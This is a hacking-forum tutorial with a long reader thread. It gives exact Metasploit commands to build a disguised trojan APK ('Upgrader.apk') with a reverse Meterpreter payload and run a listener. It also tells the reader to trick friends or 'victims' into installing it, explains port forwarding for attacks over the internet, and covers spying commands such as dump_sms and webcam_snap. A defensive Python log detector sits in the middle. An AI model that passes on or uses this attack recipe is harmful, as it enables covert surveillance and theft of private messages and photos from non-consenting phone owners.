How To: Hack Android Using Kali (Remotely)

Hello Hackers! Welcome to my 2nd post.
This is a tutorial explaining how to hack Android phones with Kali.
I couldn't find any tutorials explaining this hack/exploit, so I made one.
(Still, you may already know about this.)

Step 1: Fire Up Kali:

  • Open a terminal and make a Trojan .apk.
  • You can do this by typing:
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack Android over the WAN, i.e. through the Internet, by using your public/external IP as the LHOST and by port forwarding (ask me about port forwarding in the comment section if you have problems).

Step 2: Open Another Terminal:

  • Open another terminal while the file is being produced.
  • Load the Metasploit console by typing: msfconsole

Step 3: Set Up a Listener:

  • After it loads (it will take time), load the multi-handler exploit by typing: use exploit/multi/handler
  • Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp
  • To set the LHOST type: set LHOST 192.168.0.4 (even if you are hacking over the WAN, type your private/internal IP here, not the public/external one)

Step 4: Exploit!

  • Finally, type: exploit to start the listener.
  • Copy the application you made (Upgrader.apk) from the root folder to your Android phone.
  • Then share it by uploading it to Dropbox or any file-sharing website (like www.speedyshare.com).
  • Then send the link the website gave you to your friends and exploit their phones (only on the LAN, but if you used the WAN method you can use the exploit anywhere on the Internet).
  • Let the victim install the Upgrader app (he would think it is meant to upgrade some features on his phone).
  • However, installation of apps from Unknown Sources must be enabled (if it is not already) in the Android phone's security settings to allow the Trojan to install.
  • And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for Windows might not work on Android,
e.g. run killav, persistence (persistent backdoor), etc.

Thank You!
F.E.A.R.
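The payload built in Step 1 connects back from the phone to the LHOST on the handler's port (4444 by default). A defender watching egress logs can flag exactly that pattern. The following Python is an added example, not part of the original tutorial: it runs over constructed connection-log lines and reports internal hosts that connect out to the default handler port, or that reconnect repeatedly to the same external host:port (the beaconing seen when a session keeps dying and coming back). The log format, the internal ranges and the beacon threshold are assumptions for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample log (not from the original page): one TCP connection per
# line, "<timestamp> <src>:<sport> -> <dst>:<dport> <proto>". 192.168.0.4 is
# the tutorial's LAN listener; 198.51.100.7 and 203.0.113.10 are documentation
# addresses standing in for public hosts.
SAMPLE_LOG = """\
2015-05-01T10:00:01 192.168.0.23:41002 -> 192.168.0.4:4444 tcp
2015-05-01T10:00:05 192.168.0.23:41003 -> 203.0.113.10:443 tcp
2015-05-01T10:00:09 192.168.0.51:52120 -> 203.0.113.10:443 tcp
2015-05-01T10:01:10 192.168.0.23:41004 -> 198.51.100.7:4444 tcp
2015-05-01T10:01:40 192.168.0.23:41005 -> 198.51.100.7:4444 tcp
2015-05-01T10:02:10 192.168.0.23:41006 -> 198.51.100.7:4444 tcp
2015-05-01T10:02:15 192.168.0.51:52121 -> 192.168.0.4:80 tcp
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)$"
)

# The handler's default port. The tutorial's comments also mention 80/8080,
# but those are far too common to alert on by port alone.
HANDLER_PORTS = {4444}

# Connections from one internal host to one external host:port that count as
# a beacon (assumed threshold for the example; tune to your own log volume).
BEACON_THRESHOLD = 3

# RFC 1918 ranges checked explicitly rather than via ipaddress.is_private,
# which also treats the documentation ranges used above as private.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str):
    """Parse one log line into a dict, or return None for malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return {"ts": d["ts"], "src": d["src"], "dst": d["dst"],
            "dport": int(d["dport"]), "proto": d["proto"].lower()}


def analyse(log_text: str):
    """Return findings as dicts: kind, src, dst, dport, count.

    kind is "handler_port" for any outbound TCP flow to a handler port, and
    "beacon" for repeated flows from one internal host to one external
    host:port. A flow can produce both findings.
    """
    counts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "tcp":
            continue
        if not is_internal(rec["src"]):
            continue  # only outbound flows from the internal network matter here
        counts[(rec["src"], rec["dst"], rec["dport"])] += 1

    findings = []
    for (src, dst, dport), n in counts.items():
        base = {"src": src, "dst": dst, "dport": dport, "count": n}
        if dport in HANDLER_PORTS:
            findings.append({"kind": "handler_port", **base})
        if n >= BEACON_THRESHOLD and not is_internal(dst):
            findings.append({"kind": "beacon", **base})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['kind']:12} {f['src']} -> {f['dst']}:{f['dport']} "
              f"(x{f['count']})")
```

On the sample log this flags the LAN session to 192.168.0.4:4444 once and the WAN host 198.51.100.7:4444 twice (handler port and beacon); the ordinary 443 and 80 flows are left alone.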


Hi,

You'd need to include something in the email telling them how to enable Unknown Sources, correct? Most phones won't have this enabled by default. Just thought I might add that you need this feature enabled for the apk to run.

Nathan

Most modern phone 'users' have this option enabled already.
But thank you NATHAN for mentioning it, I'll make the changes.

Did you make a tutorial on that issue? I am interested in finding out how to get around this.

Hello F.E.A.R, I am completely new on this but wouldn't building the trojan with my public IP generate a direct communication to my modem which could be used to track me down? If so, how could that be avoided? Thank you very much!

Although I have enabled the option for unknown sources, the apk file is not opening on the Android device. What could be the reason? However, it does open on a BlackBerry Q5, though the attack was not successful.

meterpreter > dump_sms download
* Fetching 90 sms messages

  • Error getting messages: stdapi_sys_config_sysinfo: Operation failed: 1
  • Please solve this error while hacking an Android device.

I followed all the steps but at the end, after entering the command "exploit", I get stuck at "loading payload handler". Solution?

Help.

Me too... I don't get any response.

How could this possibly work on WAN if you do not add a reference to your listening server as in:
'Even if you are hacking on WAN type your private/internal IP here not the public/external'

Am I missing something?

Yes you are my friend,

In the first terminal, where you prepare the apk file, it has to be encoded with your public/external IP, so that when the file is opened it tries to connect to that specific network.

While you have to start the listener with your private IP, because that tells the listener which PC in the network will be used to control the remote Android/PC.

Hello F.E.A.R, thanks for writing this great article. I'm pretty new at doing this and I have one problem: when I open the app on my Android device it opens a meterpreter session like normal, but then I get this: Failed to load extension: No module of the name ext_server_android.jar found. Is there any way to fix it?

Hi James,
You mean, do you type in a module, or does it happen automatically?
Try it on another android, and then comment again.

(I had this same issue) EDIT/DELETE: Nevermind, seems to be working now... though I honestly don't know what I did differently this time. Thanks for the clear, fun tutorials!

You are Welcome Wolf.

One question. How do I send it to the victim? Do I install it on my phone and then send it to the victim? I am lost at that part.

My window just gets stuck on the listening stuff... even if I open the app I don't get any prompt here... help me please.

I use Kali in VMware and I installed the app on my own phone with all permissions.

This is a really great tutorial. I will give it a try...
Thanks

You are Welcome ASANTE!

Thanks a LOT for your great tutorial !

should I port forward the LPORT in my router settings?

Welcome! MATT,
Yes you should forward LPORT (4444 and 80) in your router settings
If you have problems just tell me the company and model no. of the router.

Please help me F.E.A.R. I have a TP-Link wifi router and cannot forward ports even though I have configured the TP-Link from its site (my network mask); canyouseeme.org and other sites cannot detect my opened ports!

Thanks in advance.

Oh, and I forgot to write my subnet mask - 192.168.0.1

Hi Aiden,
Configure them from this site: http://www.portfoward.com/
Even if you have configured them correctly, your ports will not open; they will get forwarded.
Just try hacking an android/PC on WAN.
If it still doesn't work, try allowing those ports through your router's firewall or try DMZ.

Hey there, GREAT tutorials!

Btw, why should we forward port number 80? Isn't that the webserver's port?

Hi! Great tutorial sir!

I'm a complete noob at this and started learning a few days back only. I'm actually planning on running an exploit via an adobe reader or ms word document with meterpreter payload. But I need to do it on WAN (over the internet). I did it successfully on LAN but can't figure out or find good reference about how to go about it on WAN.

Could you explain the port forwarding procedure and concept in detail? Maybe help me specifically with my case..
Thank You!

Have you tried OTW's tutorial about embedding backdoors to pdf's and MS word files? You should check them out. You could also try his tutorial about adobe flash player.

Goodluck! Welcome to Null Byte!

Anytime AMAN!

1st: Do you know what a public IP is? If yes, put the public IP in the first terminal and the private IP in the second terminal.

2nd: For port forwarding you have to forward some default ports used by Kali like 4444 and 80. Do this by going to the advanced tab of your router config, then the port forwarding/triggering section or simply the service section, and then forward the ports accordingly.

I don't know which router you use; please specify the name and model no. of your router, then I can explain the steps to you.

Hey, in one of your articles you mentioned you can help with port forwarding. I'm having trouble pulling off a Social Engineering attack in Kali Linux because I am unable to do it over WAN, and I don't know what I am doing wrong. I've seen many tutorials that try to show how to do it, but it is difficult because none of the interfaces are the same as mine. I try to figure it out and fill in the right information where I think it's supposed to go, but the SET attack still only works over LAN even though I put in my external IP. Your help would be greatly appreciated please. The router is a Belkin router. The model number is:

F6D4230-4 v1000

Hi Ray!

Solution:
HERE

The steps are the same even if interfaces are not.

  • Use kali's Internal IP
  • Forward Ports 4444 and 8080
  • Service Type: TCP/UDP

If you are using VMware, then switch off your anti-virus's firewall.

ALSO! GOTO FIREWALL RULES(in your router's config screen), AND ALLOW THOSE SERVICES THROUGH, IF IT DOESN'T WORK.

Another SOLUTION,
If you have the default DMZ option, enable it! This will forward all the ports.

ALSO, this won't open ports, it will only forward them, so if you use some port-testing services they will tell you that the ports are closed, SO don't worry.

Is port forwarding possible only in routers? What if I use my mobile's hotspot to get internet on Kali? How do I forward ports?

Welcome to Null-Byte,
It is complex but..., here...

I understand that port forwarding is necessary for other devices to connect to us. I don't have a router and I use Kali either on a live bootable USB or in VMware. Now, while using the live USB I can't connect to the internet using my data card and so I use my mobile hotspot, but in VMware I use NAT to connect. Can I forward ports in VMware?

In Kali I use nmap with my IP and see that all ports are closed.

NAT in VMware? and Port-forwarding? Not a chance.
Switch to bridged.


I was referring to Aman because he said he was planning to do an exploit using pdf's and .doc files. That's why my reply was placed under his comment. But good to know that you've been reading OTW's posts.

(Intense Laughter)
Oops, I should have checked before answering,
Sorry Lemon, I'll edit it.

LOL. It's okay :)

Finally somebody has a tutorial about MSF on WAN ! thanks a LOT !

Sir, I'm using a Huawei BM632w router, and I have two options under the NAT tab: "port forwarding" and "port mapping".

Which one should I use?

PS: they both have the same options.

ARMIN:
Use port forwarding option,
Add custom service,
Name: (Any)
Type: TCP/UDP
Start Port: 4444
End Port: 4444
Apply.
If that doesn't work then:
Goto to Firewall Settings: And,

Outbound services: Select service name (the same name you put before), Action: Allow, LAN Users: Any, WAN Users : Any, LOG: Never

Apply
Inbound Services : Service Name: (same) Action:Allow ,Allow , Log: Never
Apply
If that doesn't work either let me know...

I am struggling for Port Forwarding like HELL... You won't believe how many tutorials and posts I've seen on this, but nothing succeeded for me. I've posted my problem on TP-Link, Huawei and Reliance support pages, but no solution yet. I used a Reliance 3G data card (Huawei EC156) to access the internet. Then I realized port forwarding wouldn't be possible without a router. So, I bought a TP-Link TL-MR3420 3G Router. I port forwarded on the router's page, it didn't work. Turned the firewall off (both Bitdefender & Windows), still not. Switched DMZ on/off, not yet. Used a couple of softwares like PFConfig and Simple Port Forwarding, no luck. But still I am not losing hope. Please, please, if somebody knows a solution, I will be really helpful to you. I am so badly craving for Port Forwarding, only for online gaming, and even a little of this stuff!

Did you get it fixed? Even I'm not making any progress.

Sir,
I'm having two options: port mapping and port triggering.

Which one should I use?

Matt:
Go to the Port Mapping tab,there:
Put a dot into the Custom radio button.

Enter the name of the program into the Mapping Name box. It doesn't really matter what you put into this box.
Enter the port to forward into the Internal Port and the External Port boxes. (Port : 4444)

Enter the ip address to forward these ports to into the Internal Host box (IP of your hacking system).

Use the Protocol drop down box to select the protocol type of the ports you are forwarding. (Use TCP/UDP)
When you are finished, click the Apply button.
And that is it! You are done!

Source: http://portforward.com/english/routers/port_forwarding/Huawei/BM632/defaultguide.htm

http://portforward.com/

Find your own router and follow the process, they are not all the same. Don't forget to port forward to an IP, listener's one.

Thank you Ciuffy, now I don't have to worry about it.

No problem, glad I helped.

Hi FEAR,
Thanks for the interesting article.
However, being a newbie, I request your help in clarifying a few things:

1) I'm using Kali via USB (Cruzer Blade 8 GB). However, as I've been unable to install it, I'm using the Live (686-pae) option (I just selected the first option in the Boot Menu).

2) For Internet, I'm connected by data card via USB tethering (Android).

3) The problem is that every time I tether, the last three digits of my private IP address changes although the public one remains the same. So will this not create problems after the exploit on the meterpreter?

4) In Step 3: Set-Up a Listener, it says: Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp but in the screenshot of the console below it, instead of android it is windows. Which is the correct word?

Hope to hear from you soon.

Thank you.

Welcome OMEGA7:

  • Are you sure your public IP is static (remains the same)?
  • Your private IP/public IP cannot change until your router reboots or you restart your PC (or after every time you tether), even if it's dynamic.
  • While exploiting on LAN or even on WAN you should have no problem.
  • Just change the LHOST every time you start up the attack.

------------------------------------------OR-----------------------------------------------

  • Simply make it static by following these steps:
  • Navigate to /etc/network/interfaces and open it.
  • Delete this line: iface eth0 inet dhcp
  • Add this instead: iface eth0 inet static
  • Now add these to configure the static IP (all on different lines):
  • address 192.168.0.5 (your STATIC IP)
  • netmask 255.255.255.0 (netmask: let it be this)
  • network 192.168.0.0 (let it be this)
  • broadcast 192.168.0.255 (same)
  • gateway 192.168.0.1 (same)
  • Save it... and restart Kali; the changes will be permanent.
  • However, if the net doesn't work then you will have to put these cmds in a terminal every time you start Kali:
  • ifconfig eth0 down
  • sudo dhclient eth0
  • ifconfig eth0 up

------------------------------------DONE---------------------------------------------------

Also, your last query: thank you for pointing out the mistake in the screenshot, the correct cmd is : set payload android/...

Thanks FEAR,

You're right. I rechecked it and the public IP too keeps on changing. As I mentioned before, I'm a tyro and am starting from scratch and I'd appreciate it if you could kindly tell how to navigate to "/etc/network/interfaces". I tried right clicking etc, to no avail.

Thanks

Omega 7, how did you get the data card working???
Whenever I plug in my USB data card it says not able to mount???

OK Got it!
But the first and second lines are:
auto lo
iface lo inet loopback

What should I do? Delete these and type in all the details that you have given or write the details without deleting these two lines?

Now I've inserted the data card into a micromax modem and have wifi.

The details of the new connection are in the screen shot attached. Please let me know whether the configurations mentioned earlier are relevant to wifi connection too.

.... the attach link isn't working... when I click on it, the 'Upload New Image' link is not active... OK... Doing it the hard way...

Logging out of Kali. shall try to send you on win 7

Thanks

OK. Strange! In Kali, I couldn't upload. Please revert at your earliest.
Thanks

Sorry for the late reply Omega7,
I don't think your private IP will change after you have connected to a WiFi with that type of IP
Even if it does let it change don't worry about it, it won't interfere in the hacking process.

But if the public IP is dynamic, and you hack anything on WAN then the meterpreter prompt will stay until your router reboots(as the IP will change after reboot)

So, don't worry keep hacking!

Thanks a ton, FEAR, much appreciate it.
But what about my other query?

"But the first and second lines are:
auto lo
iface lo inet loopback

What should I do? Delete these and type in all the details that you have given or write the details without deleting these two lines?"

Thanks for your time.

Let it be the same, don't delete anything, don't add anything.
It would work just fine (I just saw that you are using a live Kali system, so the changes will revert anyhow).
Just change the LHOST in both every time you hack on LAN and on WAN.

I updated my Kali to 1.1.0 and I can't use msfpayload anymore. It is telling me to use msfvenom. But I don't know the command format for msfvenom if I am trying to do this Android hack.

Hi Lemon,
Well, the command for the payload in msfvenom has a slight difference.
To create the apk type:

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 -r -f apk > /root/ABC.apk

I have never really used msfvenom before, I hope the command works. If not, refer to this: HERE

Thanks F.E.A.R. I'm gonna try that in a little while.
Soon you will be using msfvenom since msfpayload is deprecated, and it will be removed on or about 2015-06-08.

You are always welcome Lemon,
And thanks for the info.

Hello, F.E.A.R.
Thanks for the beautiful article.
But I have some problems with creating the APK file.
msfpayload is deprecated!

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.120.102 -r -f apk > /root/Update.apk
Invalid option
(copied from comment above)

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.120.102 -f apk > /root/Update.apk
Invalid Format Selected

And the list of supported formats does not contain APK

# msfvenom --help-formats

Executable formats: asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

Transform formats: bash, c, csharp, dw, dword, java, jsbe, jsle, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Can you help me?

As I told BAD, I haven't used msfvenom, and I may have to reinstall Kali due to tech problems, so I can't test it; you should refer to OTW's post (link above?)

Try this:

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=1.1.1.1 R > android.apk

Hey, I followed all your steps, but when I start the .apk file, my smartphone does nothing and my screen is still at starting the payload handler. What am I doing wrong?

Hi ARCHIBALD,

  • After installing the file you also have to open it, and your smartphone is supposed to do nothing; only the meterpreter should show up.
  • Are you sure you had put down the correct LHOST ?
  • Are you hacking on WAN or LAN ?
  • A screenshot would help

Hi F.EA.R,

Thanks for the fast answer. I tried this on Virtualbox, so I dunno if my LHOST is correct, it's something strange like 10.0.0.2. I'm hacking on LAN and with a smartphone with android 4.4.4 KitKat. I'll send a screenshot as fast as possible.

You have copied the LHOST by typing ifconfig in a terminal right?

----------------------------------------------------------------------------------------------------
Or if you are using a wireless adapter to connect to a router then:
----------------------------------------------------------------------------------------------------

If the LHOST is 10.0.0.2 , even that should be correct. Modern routers are using that kind of IP. (However you can change it)

...
Also, which option are you using in the virtual box for Network Adapter?
(Bridged, NAT or Host-Only)

Yeah, that's right, I used the eth0 address and copied it to the LHOST. In Virtualbox, I'm using NAT.

Switch to bridged, always keep it bridged.
Edit: also tick the option "Replicate physical network connection state".

HI! I'm back and have been running around in circles with the process. I got a new broadband connection set up and am using a Binatone DT 850 W router. Could you PLEASE explain everything in detail, again perhaps. The objective, getting meterpreter running on a remote system over the internet by sending a malicious file over. I would REALLY appreciate your help again sir.

Welcome back Aman,

I am assuming that you know how to go to the configuration page of the router.
(If not then: Click Here
Username: "admin" Password: "admin"or"password"or"leave it blank")
If your router's config page interface is like this:

Then follow this guide:Here

Else, give me a screenshot of your router's configuration page.

Done!
What next sir?

I see you're doing pretty well, but you should explain it a bit more; that would be fine for beginners.. :p

I don't think there is anything more to explain in this guide, if anyone needs it, he/she is free to ask in the comment section, Right Here.


Can I ask a question? After installing the apk and running it, can the person uninstall it, and will it still be running? And if the Android phone is turned off and on, do I just have to exploit again or does the person need to run the application again?

Hi Martin,
1) If the apk is uninstalled, the session will also end.
2) If the phone is rebooted, the session will still end.
3) However there are a few tricks by which you can make the backdoor persistent.

Well, next problem:
Whatever I type in, it's showing me:
Unknown command: ls
Unknown command: webcamlist
I think you understand

Hi Archibald,
1) Type pwd or lpwd or cd sdcard then type ls, it will work.
2) And it's webcam_list, not webcamlist.

Hi F.E.A.R

I embedded the payload/trojan into an original apk, which in my case is ADM.apk, then signed it. After I install the apk it works properly, and as long as the Android device is connected to WiFi I can do everything from msfconsole like downloading or webcam_snap or dump_sms etc., but when I turn off the WiFi and turn mobile data on (I set it to 2G because the victim I want to install the apk on has 2G!!!!! and I want everything to be the same as his situation), in my msfconsole I can only run the core commands like "run", and if I try all the other commands it says something like:

Unknown command: ls
Unknown command: pwd
I can just get his IP, but the problem is when I locate him it shows the wrong location.
What should I do to make the other commands work properly on mobile data like they work on WiFi?
I appreciate your answers. Thanks

Am I doing something wrong in the settings of my router?

Everything works when the smartphone is connected to the same WLAN, but over the WAN it doesn't start.

Thanks a lot

Hi Angelo!
You have successfully forwarded port 4444, but it seems your firewall is blocking this port.

Goto firewall in your router configuration, and Select the port/service, then Allow all the inbound and outbound rules for that service, also give the Private IP of Kali if asked.

Done! Now follow the steps correctly for WAN method.
If it does not work, get me a screenshot.

FEAR,

My Android said "Can't Open File". I set it to accept from unknown sources, but it still says it cannot open it. So I downloaded an APK installer and installed it, but it still cannot open it. Also, does this exploit have to be done with 2 cellphones? Can I just copy the APK file straight from my root folder to the download site? Because I see one of your steps is to first copy the file to your Android phone.

Buckeroo,
Try this on another android, if it still doesn't work then maybe the command for creation of the apk is wrong.
No, you need only one cellphone ( 2, if you are hacking using a cell)
Yes you can directly copy/upload the file from your root folder.

I have the same problem on two different android devices

Bro, please help me out with port forwarding for this, I'm kind of new.

Also, I have a ZTE ZXV10 W300 router. I don't have a static IP, it changes every time I restart the router.

Also, should I install NOIP for this?

I hope your router's interface is like the one in this guide: /here

Forward ports: 4444 and 80 (or 8080)
If any problems occur, you are free to ask.

And no, you shouldn't use NOIP; it doesn't make your IP static. However, you can use it to keep checking on your IP. (I think every 5 min)

Wow! Thanks F.EA.R for the tut.

I tried it on one of my droids and it works. I have a question though: where is the trojan's directory located once it is installed? I tried to remove it from my Android and I can't seem to find it or anything. It's like stuck on there unless I disconnect from my side. Sorry for the newb question. Thanks for everything!

Welcome! James,
The Trojan's default name is Main Activity (application name),
Search for it in the application manager, and uninstall it, from there.

Hey, I'm new here and I think I did everything right, but I can't find the app I created (I named it upgrade.apk).

Name of Application: Main Activity (though you can change it)
EDIT: Main Activity.apk

I think you can find it in your home folder.

Why does the Meterpreter session close nearly 20-30 sec after opening, and the REASON is DIED?????

Antivirus (especially CM and when you are hacking on WAN)

So what is the solution???????

Also... how do I hack the Android using Kali when me and the soon-to-be 'victim' are on different networks???

Could you re-frame the question please? If you are asking hacking on WAN, this guide shows that too.

Uninstall antivirus...

The problem was resolved by uninstalling the antivirus, and now I have a question: after I forward a port in my TP-LINK WR841N router by adding a virtual service and then check for it with nmap, it gives the result that all 1000 ports are closed. Why???

One more thing I noticed: whenever I try to hack my Samsung smartphone it opens a meterpreter session and then closes after 20-30 seconds, but when I try to hack my Micromax smartphone it gets hacked and I can use it as long as I want. Are Samsung phones more secure????

Yes, I think Samsung smartphones have an in-built security checking system. (I faced problems with Samsung too)

Port forwarding and opening ports are two different things.
Once you've forwarded the port (4444) That means you are good to go.
(If it doesn't work, allow those ports through the Firewall of your router)

Hello!
How do I port forward on a PROLiNK H5004NK ADSL Wireless Modem?

Hi! I am having some issues with the meterpreter "webcam_snap". When I try webcam_snap 1 or webcam_snap 2 they both take a picture on the back facing camera. Do you know how I can do it on the front facing camera?

Hi! Cameron,
Hmm.. Try this: webcam_snap -I 2
Or try streaming: webcam_stream 2
Or this: webcam_stream -I 2
When you run the command webcam_list then you get a list of two webcams (1. front camera and 2. back camera) right?

Hey man, first of all I have to tell you this is an amazing tutorial, a big thanx for it. Secondly, I have done all the things you said but can't go beyond a step, i.e. near the last step it says starting payload handler and is stuck on that. What should I do to fix it? And yeah, I'm a noob so a little less technical will be appreciated. Thanx in advance man.

And ya, some more tutorials are expected from you bro!! Keep on posting.

Hey man, so now it's working but I can't take a picture from the webcam. It says error running command webvam snap: NoMethodError undefined method value for nil : Nil class. Mic recording also doesn't work, and ya, how do I read messages?? The DumpSMS command does not work!! Thanx man

You can see the available commands by typing ?

Yes, it's true, question mark.
It pops up all the commands available to exploit.

You are welcome RAY,
The command is; webcam_snap NOT webvam_snap. Also type this: webcam_snap 1 it will work.
For messages type dump_sms instead of Dump_SMS. Tell me the error If it still doesn't work.

Hi FEAR, thanx for such a fast reply. Actually that was just a typing mistake, I typed exactly what you have said and the error still continues man. Plus, when I type help, commands for Android do not show up. The error when I type webcam_snap 1 is

error running command webcam_snap: NoMethodError undefined method value for nil : Nil class
So what should I do? I type the correct command and it still shows this one.
Should I attach a snapshot of the error?? Thanx again man

I think you should try this on another phone; if it works, then the problem is with the phone, not with your commands or Kali.

And ya, I am the same guy as above!! Just forgot my user name so I'm using another account!! Oops!!

Your username is: christopherray

OK so how do I upload a screenshot??

You click on the little picture icon that says "add an image" when you hover over it.

OK then FEAR, I tried this on another phone and most of the commands are working, but still none of the Android commands are working man!! Like dump_sms and all. What am I doing wrong then??

OK then, tell me the error. Try checking its root (I think the cmd is check_root). If it says the device is not rooted then the cmds may not work. (You don't need to root your device, just run this cmd in meterpreter.)

ryuto555# msfpayload android/meterpreter/reverse_tcp lhost=[THIS IP] R > upgrade.apk

What IP should I add here [THIS IP] if I'm going to hack through WAN?

Public/External IP

Hey F.E.A.R bro, first of all thanx for the tutz ;)

I need the tutorial that works on WAN, and it must be a persistent one. Can you mail me the complete steps to make the backdoor (WAN based) and the persistent backdoor?

email : solothehacker@gmail.com

Welcome! Solo Hacker

I'll be making a tutorial for that soon.. Maybe today. I had it planned from the start using scripting, but I am poor at it. So I took time but nothing seemed to work out, so I gave up, until you commented. Then I remembered and took 20 hrs googling for the syntax of commands.

Thanks to you, after ~40 futile tries I made it work.
Just wait a little for the tutorial. ;)

:) thank you bro. and thank you for the email. :P
The tutorial you added in that link, will it work on WAN? I mean, will it work through the internet?

Welcome! SHacker,

Yes, the guide will work on WAN, until the Android system reboots or your public IP changes (but if the phone is rooted and you have a static IP, then it will work forever).

These things have been mentioned in the guide. (Also, the guide is here on Null-Byte)

Anytime! SHacker

Great! all other ways to make a persistence backdoor didn't work. I'm looking forward to your great tutorial. Could you please share your tutorial's link here?

Hello, I tried following the steps in BackTrack 5 R3 but am getting these errors.. please check..

While creating the .apk file I get an error but the file is still created,
and while installing the file on Android it says "there is a problem while parsing the package".
Please help.

You spelled android wrong while creating the payload.

This parsing error is occurring on Android 5.x.x devices. One of my devices which had 4.4.2 allowed installation of AndroRAT and the Metasploit reverse tcp; however, after an upgrade to Lollipop I started getting a parsing error when trying to install the RAT.

Hi to everybody! Does anybody know if something is wrong with "webcam_snap" in the latest version of Metasploit? For me it doesn't work anymore after upgrading to Framework Version: 4.11.1-2015040202. I've tried to create the payload with both "msfpayload" and "msfvenom" but I've got the same result:

"webcam_stream" doesn't work either; it opens the webpage but no image is shown.
The other commands are working well.

I'm using 3.18.0-kali3-amd64 (Kali Linux) installed on an HP 250 machine and I've tried to exploit an Asus MemoPad 10 with Android 4.2.2, if that helps.

Thanx .

Hi Bobbe and Welcome to Null Byte!
Have you tried this command on another Phone/Android?
Maybe this Android system, or an anti-virus software installed on it, denies it from opening/starting the webcam/camera.

Hi F.E.A.R and thanx. I didn't try yet, but it was working just fine till I upgraded Metasploit, only with AV deactivated.. I'll try to uninstall it to see if it works. Thank you again.

HI F.E.A.R, hello to everybody. I followed your suggestions but I get the same result.. New device tested (Majestic branded phone tab with 4.2.2 Jelly Bean), no AV, no active firewalls, but "webcam_snap" didn't work.. Both tested devices are rooted.. Does anybody have any ideas? Anybody who uses the same version of Metasploit who can confirm that "webcam_snap" still works? Tests were made in both LAN and WAN..

Thank you!

Hello Bobbe,
I'm out of ideas, but if both devices are rooted no problems should occur. I'll need some time to look into it.

Hi. I'm out of ideas too :) . I suspect some missing updates on Ruby for my version of Metasploit... or maybe it's my machine that has some missing updates. I have no clue. One of these days I will try the online version of Metasploit from Rapid7 to see if it works there, 'cos I think it's a newer version than Kali's one..

Thanx for the answer, and greets for the tutorials. Nice job!

I think you should uninstall Metasploit and install it again. This should help.
Welcome, Bobbe.

Yup. But I'm not sure which version I should install..
I think I'll downgrade to an older version.. It was working fine before the upgrade..
Thank you again!

I see an outdated version of Ruby on my Kali... I don't know if upgrading that will help or mess up everything... What version/revision of Ruby does your Metasploit use?

I never updated my Kali, and never will, until I know it's verified, and only for custom updates (not random packages) (even Metasploit).

Ruby version 1.9.1

Hello. I have to say that you are right. I've just reinstalled the OS :) , I messed up everything.. now I have to test Metasploit to see if it works. Thank you for the answer. Have a nice evening.

Welcome, Bob!
You too have a good evening! (It's night here actually)

Can we use No-IP on this?

I mean a public IP, since we have dynamic IPs?

Hi Back,

I don't think we can use 'No-IP' on this; it takes time to refresh, but if you make the backdoor persistent, then it may work!

Will try someday and let you know.

Hello, I'm a newbie and just beginning to learn Kali Linux.
Now I'm dual booting live from a USB on my desktop PC.

I don't find wlan, as I don't have a wireless card, and I think that's not a problem for now.

My IP address is 192.168.1.101 and I can hack into any local Android phone on which my app is installed. But when the same app is opened by someone else from a distance of 1 km or less, it doesn't show up in my Kali Linux.

Another problem: can you explain to me briefly how to hack them over WAN (i.e. by the WAN method), as I'm really confused there.

Thanks and Regards,
xMidnightSnowx

Hi folks,

I really don't get how this reverse TCP works... in terms of... when I shut down, or the owned device shuts down.. does it still work?

Likewise, if I install the apk on a victim's device and my LHOST is not running.. does it still work? (logically not, but later) In a few hours? Does it stop working or something like this? How about more than 1 victim^ ... 10 on the same port? Can it handle 10-20? That the receiving host must be running is clear... etc... I'm a little confused... Does the LHOST have to be always running, or is it OK to infect with the apk... like a one-hit wonder... or is it an always-running gag.... That's what was confusing me...

Re-frame the questions please!
My answer otherwise:
Uninstall antivirus/Use a persistent backdoor.
Yes, 'it' can handle about 10, if the sessions are in the background.
??

My router is a TP-LINK TL-WR740N. Can you help me with port forwarding?

My router is a TP-Link WR740N and I am having a tough time forwarding the ports. Can u help plz?

Hi Guys!
Solution: Here
Use Kali's internal IP while forwarding ports.
EDIT: And forward ports 4444 and 8080.

Is there a command to take a screenshot of an Android device once you have exploited it?
Or look at their chats on social networks?

Just type screenshot in the Meterpreter shell.

I don't think that works does it?

Hi Fear,

When I type exploit and it starts, then I click the apk on the phone and open it, but it doesn't work.. I try to open the port but I don't know how.

I have a Netgear DGN2200v4.

Do you mean port forwarding the port? That is what you need to do for WAN.

Hi Andr,
You should mention whether you are hacking on LAN or WAN.

Excuse me sir, I've got a problem. I always get stuck when configuring the WAN / wide area network. This is my screenshot; it always gets stuck at "starting the payload handler". I tried it on my smartphone but it didn't pop up on my Kali. Help will be appreciated. Thank you so much. Sorry, newbie :(

Image via akamaihd.net

Looks like you almost did everything right!
I'll ask 3 questions:
1) While creating the payload, did you put in your public IP?

2) Does your router's configuration page have a firewall settings option? If yes, then allow the inbound and outbound services through this port. (If it has a DMZ option, enable that too.)

3) Do you click open after you install the file on the Android?
And now try it again.

Hello,

